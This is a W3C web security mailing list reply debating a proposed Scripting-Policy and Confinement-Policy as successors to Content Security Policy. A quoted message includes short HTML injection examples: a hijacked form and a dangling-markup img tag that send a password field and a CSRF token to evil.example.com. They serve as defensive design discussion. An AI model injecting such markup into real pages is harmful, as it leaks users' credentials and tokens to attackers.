W3C home > Mailing lists > Public > public-webappsec@w3.org > July 2019

Re: A modest content security proposal.

From: Mike West <mkwst@google.com>
Date: Tue, 16 Jul 2019 12:54:02 +0200
Message-ID: <CAKXHy=e9stECw8Zv7SzJHwcgQ3ghVzY7kEMQ-cDiPg0xjHaGQw@mail.gmail.com>
To: Craig Francis <craig.francis@gmail.com>
Cc: Web Application Security Working Group <public-webappsec@w3.org>
Thanks for your feedback! I'll concentrate on the resource confinement
feedback, as it's the part I've thought least about, and I'd like to
understand your perspective!

On Mon, Jul 15, 2019 at 2:15 PM Craig Francis <craig.francis@gmail.com>
wrote:

> Initial thoughts from a web developer, one that really likes CSP...
>
> I like the idea of the browser providing the nonce, and that being used to
> white-list scripting - it feels like a good way to prove the website did
> intend to include that script. It also means the browser knows the nonce is
> random/unique (where developers should still be careful, you're reflecting
> a value back in your HTML).
>
> And simplifying the process by locking down <base>, <object>,
> "javascript:" URLs, etc; that should set a good/simplier baseline (where I
> think "allow" should be re-named "allow-unsafe", and I would prefer eval to
> be "block" by default).
>

In hindsight, I don't think the `unsafe-` prefixes made us any friends in
the development community. Nor do I think they stopped anyone from doing
unsafe things. It just made them irate while they were doing so. :)


> The bit I feel like I'm missing, and it might be because I enjoy applying
> multiple layers of protection, is the *Resource Confinement* side.
>
> On my websites, I have a folder for static resources (`php_admin_flag
> engine off`), that's under version control, replaced every time the website
> is updated (with a diff check before), and it's not writable to by the web
> server process (so no user uploaded/replaced content) - I like to ensure
> that all JS/CSS/Images/Fonts are loaded from that safe folder, and I can do
> that because the CSP specifies specific paths that are served from that
> locked-down folder.
>

It's certainly _possible_ to construct a path-limited policy like this
today. As far as I can tell, no one does this at any scale, as it's quite
brittle and requires close coordination between teams responsible for
different bits of a site. Likewise, the fact that we drop the path after a
cross-origin redirect significantly weakens the guarantees we can provide.

I agree that a pathless proposal is strictly less powerful than CSP, but it
seems like a reasonable place to start, given that that's what sites
generally seem to have landed on after a few years of experience with CSP.

A possible solution would be a second domain, but that would slow the page
> load time a little bit, make the server config a bit more complex, and
> might lose some restrictions - such as the user-uploaded images folder
> containing a malicious JavaScript file (will I need a different domain for
> each resource type?).
>

I'm curious about the value you see here. It seems that script injection is
cleanly dealt with via the `scripting-policy` bits, and any protection
you're getting from confinement is additive. It can absolutely reduce risk
even further, but it's not clear to me that there's much value in
preventing script execution above and beyond pointing only to servers that
you trust?

I also dynamically set the CSP for every page - e.g. most pages are ok with
> `connect-src 'none'` (from default-src), but when a page/script needs to
> use XMLHttpRequest, then I explicitly set the full URL for the 1 API it
> needs to access.
>

This is a lot of work! :)


> The intention is to have layers... 1. my server side code shouldn't have
> any XSS vulnerabilities; if it does, 2. CSP should stop the loading of
> scripts; if that fails (e.g. a legitimate script was replaced by a hacker),
> 3. that script should be limited in what it can do to that page.
>

Nothing in this proposal (or CSP) limits the capability of a script to
modify a given page. They both seem to limit the ability of a script to
pull in resources, and potentially to exfiltrate data.

This also applies to limiting what content can be loaded in frames (e.g.
> blocking an iframe from showing a malicious login form, which is why I have
> frame-src 'none' for most pages).
>

Presumably we'd add some sort of `frames` category to `Confinement-Policy`
to support this specific thing.


> And finally, some DOM messing around can cause issues:
>
>    <form action="https://evil.example.com">
>    <form action="./">
>       <input name="password" />
>    </form>
>
>    <img src='https://evil.example.com<form action="./"><input name="csrf"
> value="abc123" />...' />...
>

These are indeed problems (along with the rest of
http://lcamtuf.coredump.cx/postxss/).


> Maybe introduce Scripting-Policy first; then deprecate the
> old/un-necessary parts of CSP, but still keep CSP around with a focus on
> Resource Confinement?
>

`Scripting-Policy` is the bit I'm most interested in, to be sure. I'm
interested in `Confinement-Policy` mostly as a way to support the
belt-and-suspenders approach noted in
https://csp.withgoogle.com/docs/faq.html#strict-dynamic-with-whitelists.

I think it will be difficult to use `Scripting-Policy` with CSP's
`script-src` directive (or, at least, I'd consider it a non-goal to make
that interaction simple and easy). If we're going to run in this direction,
I'd prefer to just do one thing. Obviously we wouldn't dump CSP tomorrow,
but I don't think keeping both around forever is a reasonable plan.

Thanks!

-mike

>
Received on Tuesday, 16 July 2019 10:54:39 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 16 July 2019 10:54:40 UTC